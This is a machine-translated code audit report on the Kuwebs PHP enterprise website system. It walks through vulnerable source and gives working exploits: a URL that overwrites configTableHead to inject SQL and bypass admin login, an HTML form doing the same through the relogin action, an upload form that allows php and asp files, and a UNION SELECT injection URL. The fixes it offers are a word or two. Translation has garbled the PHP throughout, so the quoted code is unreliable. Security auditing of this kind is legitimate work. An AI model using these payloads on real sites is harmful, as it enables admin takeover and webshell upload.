Kuwebs code audit report packaging and fixing of various vulnerabilities

Here is an introduction:

Cool weft enterprise website management system is a marketing website system developed by cool weft information (www.kuwebs.com) to provide a package of solutions for enterprise websites. The backend adopts the PHP + Mysql architecture, built-in enterprise profile module, News Module, product module, image module, download module, online message module, FAQ module, and link module. The front-end adopts DIV + CSS and complies with SEO standards. It provides professional marketing websites for enterprises through templates or customization.

 

0.19 million...

 

 

Recommended code audit tools: Seay PHP code audit tool 2012 final version

: Http://www.bkjia.com/soft/201211/35390.html

 

Author: Seay

Blog: http://www.cnseay.com/

 

Download this article and EXP:
Http://www.cnseay.com/wp-content/uploads/2012/12/kuwebscode audit report leakage packing and repair .rar

Vulnerability list:

I. Variable coverage Vulnerability

2. Blind comments

3. Online Application blind Injection

4. getIP () function Injection

V. File Inclusion Vulnerability

Vi. Variable coverage, injection of various methods to bypass login after the flight

VII. Arbitrary File Upload Vulnerability

8. online feedback Injection Vulnerability

Unlimited injection...

Delete any file...

Download any file...

Unlimited ....

 

 

I. Variable coverage Vulnerability

Check the index. php file on the home page and start with 'inc/common. inc. php.

 

<? Php

Require_once 'inc/common. inc. php'; // load the system public functions and the foreground configuration file of the system.

 

If (2 = $ kuWebsiteHTMLStartType)

{

// Echo $ kuHttpPath. 'index _ '. $ kuWebsiteDefauleIndexLanguage. $ kuWebsiteTempHTMLType;

$ Content = @ file_get_contents ($ kuHttpPath. 'index _ '. $ lang. transferHTMLType ($ kuWebsiteHTMLType ));

If (! Empty ($ content ))

{

Echo $ content;

Exit;

}

}

 

 

'Inc/common. inc. php' and admin \ inc \ common. inc. php see a piece of classic code that overwrites the variable

 

$ _ POST = filterChar ($ _ POST );

$ _ GET = filterChar ($ _ GET );

$ _ COOKIE = filterChar ($ _ COOKIE );

 

If (! Ini_get ('register _ globals '))

{

@ Extract ($ _ COOKIE, EXTR_SKIP );

@ Extract ($ _ FILES, EXTR_SKIP );

}

 

 

Foreach (array ('_ cookies',' _ Post', '_ get') as $ _ request)

{

Foreach ($ _ request as $ _ key => $ _ value)

{

$ Key {0 }! = '_' & $ _ Key = daddslashes ($ _ value );

}

}

 

 

Fix: do not define variables lazily. If you want to register variables without having to worry about it, you can just drop this code.

 

2. Blind comments

Message/add. php file

 

<? Php

Require_once '../inc/common. inc. php ';

$ KuMessageBackSendUrl = $ kuHttpPath. "message/index. php? Lang = {$ kuWebsiteCurrLanguage} & menuid = {$ menuid} & page = 1 ″;

 

 

$ StrSql = "select id, menutitle from {$ configTableHead} menu where fatherid = {$ menuid} and lang = '{$ kuWebsiteEditVersionLanguage }';";

$ Result = $ dbInstance-> query ($ strSql );

While ($ row = $ dbInstance-> fetchArray ($ result ))

{

$ SecondMenuNav [] = $ row;

}

 

 

$ Menuid has no single quotation marks.

 

Fixed: single quotes

 

 

3. Online Application blind Injection

/Job/resume. php file 40th lines

 

$ ArrMenuInfo = getMenuIdInfo ($ menuid );

$ TopMenuId = ";

If (count ($ kuMenuList [$ kuProductShow ['type3']) $ topMenuId = $ arrMenuInfo ['type3'];

Else if (count ($ kuMenuList [$ kuProductShow ['type2']) $ topMenuId = $ arrMenuInfo ['type2'];

Else if (count ($ kuMenuList [$ kuProductShow ['type1']) $ topMenuId = $ arrMenuInfo ['type1'];

 

 

GetMenuIdInfo ($ menuid). Let's take a look.

In line 2 of the \ inc \ commonfunc. inc. php file

 

Function getMenuIdInfo ($ id)

{

If ("==$ id | 0> $ id) return;

Global $ configTableHead, $ kuWebsiteCurrLanguage, $ dbInstance;

$ StrSql = "select id, fatherid from {$ configTableHead} menu where id = {$ id };";

$ Row1 = $ dbInstance-> getOne ($ strSql );

 

 

We can see that there is no single quotation mark injection in the database.

 

Fixed: single quotes

 

 

5. getIP () function Injection

 

\ Inc \ commonfunc. inc. php file and admin/inc/commonfunc. inc. php

 

Function getIP ()

{

If (getenv ("HTTP_CLIENT_IP") & strcasecmp (getenv ("HTTP_CLIENT_IP"), "unknown") {$ ip = getenv ("HTTP_CLIENT_IP ");}

Else if (getenv ("HTTP_X_FORWARDED_FOR") & strcasecmp (getenv ("HTTP_X_FORWARDED_FOR"), "unknown") {$ ip = getenv ("HTTP_X_FORWARDED_FOR ");}

Else if (getenv ("REMOTE_ADDR") & strcasecmp (getenv ("REMOTE_ADDR"), "unknown") {$ ip = getenv ("REMOTE_ADDR ");}

Else if (isset ($ _ SERVER ['remote _ ADDR ']) & $ _ SERVER ['remote _ ADDR '] & strcasecmp ($ _ SERVER ['remote _ ADDR'], "unknown ")) {$ ip = $ _ SERVER ['remote _ ADDR '];}

Else {$ ip = "unknown ";}

Return ($ ip );

}

 

A common problem is that we can filter data and ignore GPC. We can control HTTP_CLIENT_IP, resulting in injection. This function is called only several times in the background. There are calls at the login site, but they are used for wood.

 

 

Fix: Verify IP address format

 

V. File Inclusion Vulnerability

In the admin // index. php file

 

<? Php

Session_start (); // enable session

Require_once ('inc/common. inc. php ');

If (! Empty ($ menu )&&! Empty ($ path) // determines the entry Parameter

{

If ('php' = fileExt ($ menu) // checks whether the menu is a php file.

{

Include_once ($ path. '/'. $ menu );

}

Else

{

Include_once ($ path. '/'. $ menu. '. inc. php ');

}

Exit;

}

Include_once ('inc/logincheck. php'); // load the administrator login module

Include_once ('template/'. $ adminTemplateName.'/index.html '); // configure the suffix index.html Static Page

?>

 

 

When a parameter is received, the system determines that the system has logged on. Later, the system overwrites the parameter with its variables. $ menu and $ path are both controllable and include directly.

Fix: dare not include such files

 

Vi. Variable coverage, injection of various methods to bypass login after the flight

Bypass login 1,

Let's take a look at the file admin/inc/logincheck. php for verification login.

<? Php

Session_start ();

Require_once ('common. inc. php ');

$ AdminId = $ _ SESSION ['adminid'];

$ AdminUser = $ _ SESSION ['adminuser'];

$ AdminPassword = $ _ SESSION ['adminpassword'];

 

 

$ StrSql = "select id, adminuser, adminpassword from {$ configTableHead} admin where adminuser = '{$ adminUser}' and adminpassword = '{$ adminPassword }';";

$ Row = $ dbInstance-> getOne ($ strSql );

If (1> $ row ['id'])

{

PromptMessage ("index. php? Lang = {$ kuWebsiteEditVersionLanguage} & path = login & menu = login ", $ promptNonLogin, $ configJumpTime );

Exit;

}

 

?>

 

 

$ ConfigTableHead variables can be overwritten. If there is a problem, directly overwrite the injection.

EXP:

Http://www.cnseay.com/admin1/left.php? Lang = cn & configTableHead = kuwebs_admin limit 1% 23 seay

 

 

 

Bypass login 2,

 

Let's take a look at the logged-on file Admin/login/login_action.inc.php, and the $ configTableHead variable in line 104.

 

Else if ("" = $ action)

{

$ UserName = trim ($ _ POST ['username']);

$ Password = $ _ POST ['pass'];

$ CheckCode = trim ($ _ POST ['checkcode']);

If (empty ($ checkCode) | $ _ SESSION ["code"]! = $ CheckCode)

{

PromptMessage ("index. php? Lang ={$ kuWebsiteEditVersionLanguage} & path = login & menu = login ", $ promptEmptyCheckCode, $ configJumpTime, $ adminHttpImgPath, $ kuLanguage );

Exit;

}

If (1> strlen ($ userName) | 1> strlen ($ password ))

{

PromptMessage ("index. php? Lang = {$ kuWebsiteEditVersionLanguage} & path = login & menu = login ", $ promptEmptyLogin, $ configJumpTime );

Exit;

}

$ UserPassword = CommTool: encryptMd5 ($ password, $ configEncryptTimes );

$ StrSql = "select id, adminuser, adminpassword from {$ configTableHead} admin where adminuser = '$ username' and adminpassword =' $ userpassword ';";

$ Row = $ dbInstance-> getOne ($ strSql );

If (1> $ row ['id'])

{

PromptMessage ("index. php? Lang = {$ kuWebsiteEditVersionLanguage} & path = login & menu = login ", $ promptLoginFail, $ configJumpTime );

Exit;

}

Else

{

$ _ SESSION ['adminid'] = $ row ['id'];

$ _ SESSION ['adminuser'] = $ row ['adminuser'];

$ _ SESSION ['adminpassword'] = $ row ['adminpassword'];

If ($ configIsLog) CommTool: writeLog ("");

If ($ configIsLog) CommTool: writeLog ("{$ _ SESSION ['adminuser']} login to system ");

$ Adminmodifyip = getIP ();

$ StrSql = "update {$ configTableHead} admin set regtime = '{$ nowTime }', adminmodifyip = '{$ adminmodifyip}' where id = {$ _ SESSION ['adminid']} ";

If ($ dbInstance-> query ($ strSql ))

{

PromptMessage ($ adminHttpPath. 'index. php', $ promptLoginSuccess, $ configJumpTime );

Exit;

}

Else

{

$ _ SESSION ['adminid'] = ";

$ _ SESSION ['adminuser'] = ";

$ _ SESSION ['adminpassword'] = ";

PromptMessage ("index. php? Lang = {$ kuWebsiteEditVersionLanguage} & path = login & menu = login ", $ promptLoginUpdateFail, $ configJumpTime );

Exit;

}

}

 

 

Obviously, we can overwrite $ configTableHead with the preceding variables and inject it again, bypassing login,

Behind an egg pain

$ StrSql = "update {$ configTableHead} admin set regtime = '{$ nowTime }', adminmodifyip = '{$ adminmodifyip}' where id = {$ _ SESSION ['adminid']} ";

If ($ dbInstance-> query ($ strSql ))

{

PromptMessage ($ adminHttpPath. 'index. php', $ promptLoginSuccess, $ configJumpTime );

Exit;

}

Else

{

$ _ SESSION ['adminid'] = ";

$ _ SESSION ['adminuser'] = ";

$ _ SESSION ['adminpassword'] = ";

 

 

Record Management login logs. This is not composite with the preceding injection, and the session is rolled back. It disappears after login.

 

 

But let's look up a bit. Starting from line 1

Else if ("relogin" ==$ action)

{

$ OldAdminUser = $ _ SESSION ['adminuser'];

$ _ SESSION ['adminid'] = "";

$ _ SESSION ['adminuser'] = "";

$ _ SESSION ['adminpassword'] = "";

$ UserName = trim ($ _ POST ['username']);

$ Password = $ _ POST ['pass'];

If ($ configIsLog) CommTool: writeLog ("$ oldAdminUser Exit. Change into $ userName to login ");

If (1> strlen ($ userName) | 1> strlen ($ password ))

{

PromptMessage ("index. php? Lang = {$ kuWebsiteEditVersionLanguage} & path = login & menu = login ", $ promptNonLogin, $ configJumpTime );

Exit;

}

$ UserPassword = CommTool: encryptMd5 ($ password, $ configEncryptTimes );

$ StrSql = "select id, adminuser, adminpassword from {$ configTableHead} admin where adminuser = '$ username' and adminpassword =' $ userpassword ';";

$ Row = $ dbInstance-> getOne ($ strSql );

If (1> $ row ['id'])

{

If ($ configIsLog) CommTool: writeLog ("{$ _ SESSION ['adminuser']} login to system failed ");

PromptMessage ("index. php? Lang = {$ kuWebsiteEditVersionLanguage} & path = login & menu = login ", $ promptLoginFail, $ configJumpTime );

Exit;

}

Else

{

$ _ SESSION ['adminid'] = $ row ['id'];

$ _ SESSION ['adminuser'] = $ row ['adminuser'];

$ _ SESSION ['adminpassword'] = $ row ['adminpassword'];

If ($ configIsLog) CommTool: writeLog ("{$ _ SESSION ['adminuser']} login to system Success ");

PromptMessage ("index. php", $ promptLoginSuccess, $ configJumpTime );

Exit;

}

 

 

Obviously, the session is not rolled back here, so we can overwrite the $ configTableHead variable to inject and bypass login.

 

EXP:

 

<Html>

<Head>

<Title> www.cnseay.com </title>

</Head>

<Body>

<Form name = "form1" method = "post" action = "http://www.cnseay.com/admin1/index.php? Lang = cn & path = login & menu = login_action & action = relogin ">

<Input name = "username" type = "hidden" value = "admin"/>

<Input name = "pass" type = "hidden" value = "admin"/>

<Input name = "configTableHead" type = "hidden" value = "kuwebs_admin limit 1 #1"/>

<Input type = "submit" value = "login">

</Form>

</Body>

</Html>

 

 

Modify www.cnseay.com/admin1to the address at the back of the website and click here.

Of course, there are more than these bypass methods, such as overwriting database connection characters.

 

Fix: not to mention...

 

 

8. Arbitrary File Upload Vulnerability

 

Almost all variables that are overwritten by such variables have arbitrary file uploads.

Check that the admin/uploadfilesave. php file has the permission to verify the logon. Check the 72 lines again.

$ Downloadurl = upload ('imgurl', $ kuWebsiteAllowUploadFileFormat );

 

Look at the upload function

Function upload ($ form, $ fileFormat)

{

Global $ promptIncludeDirUploadFileCanNotWrite, $ promptIncludeDirCorrectUploadFileFormat, $ promptIncludeDirCopyUploadFileError;

If (is_array ($ form ))

{

$ Filear = $ form;

}

Else

{

$ Filear =$ _ FILES [$ form];

}

/.. Omitted ./

If ($ fileFormat! = ""&&! In_array (strtolower ($ ext), explode ("|", strtolower ($ fileFormat ))))

 

We only need to overwrite the $ kuWebsiteAllowUploadFileFormat variable to upload any file.

 

Give EXP directly:

<Form name = "form1" enctype = "multipart/form-data" method = "post" action = "http://www.cnseay.com/admin/include/uploadfilesave.php? Action = add ">

<Input type = "file" name = "imgurl">

<Input type = "hidden" name = "kuWebsiteAllowUploadFileFormat" value = "php | asp | aspx">

<Input type = "submit" name = "Submit" value = "">

</Form>

 

Fix: not to mention...

 

 

8. online feedback Injection Vulnerability

See the file plus/feedback. php 105

$ StrSql = "select * from {$ configTableHead} {$ fType} where id = {$ objectid }";

No single quotes

Test:

Http: // localhost/kuwebs/plus/feedback. php? Feedbacktype = 1 & objectid = 1 and 1 = 2 union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16

 

Unlimited injection:

There are many such injections, such as admin/menu/menu_modify.inc.php files.

$ StrFather = "select * from {$ configTableHead} menu where id = {$ fatherId };";

There are not so many columns.

 

Repair: Single quotes...

 

 

Variable overwrite is a big problem, which can easily lead to a secondary exploitation vulnerability. If you delete any file mentioned above, go to the background black box and check it.

 

Now I have seen the problem here. There are too many problems. Let's take a look at it later.